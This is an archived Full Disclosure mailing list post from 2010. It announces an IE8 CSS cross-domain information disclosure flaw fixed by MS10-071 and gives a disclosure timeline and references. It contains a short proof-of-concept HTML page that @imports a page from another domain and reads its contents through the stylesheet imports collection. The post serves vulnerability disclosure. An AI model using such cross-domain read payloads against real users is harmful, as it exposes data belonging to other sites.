Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

IE8 Css Cross-Domain Information Disclosure Vulnerability
From: IEhrepus <5up3rh3i () gmail com>
Date: Thu, 14 Oct 2010 22:27:03 +0800

IE8 Css Cross-Domain Information Disclosure Vulnerability

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2010/10/14
References: http://www.80vul.com/ie8/IE8%20Css%20Cross-Domain%20Information%20Disclosure%20Vulnerability.txt

Overview:

MS-071 have fixed a  Cross-Domain Information Disclosure Vulnerability
by CSS imports() on IE8, this vul look like had fixed on 2005 by
hacker.co.il[1],but when it work well on IE8 .

POC[2]:

<html>
<head>
<style>
@import url("http://hi.baidu.com/hi_heige";);
</style>
<script>
function loaded() {
  alert(document.styleSheets(0).imports(0).cssText);
}
</script>
</head>
<body onload="loaded()">
</body>
</html>

Disclosure Timeline:

2010/09/09 - Found this Vulnerability
2010/10/12 - Microsoft Security Bulletin MS10-071 Published
2010/10/14 - Public Disclosure

References:
[1] http://www.hacker.co.il/security/ie/css_import.html
[2] http://80vul.com/cssinj/ms071.html

-- 
hitest

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • IE8 Css Cross-Domain Information Disclosure Vulnerability IEhrepus (Oct 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]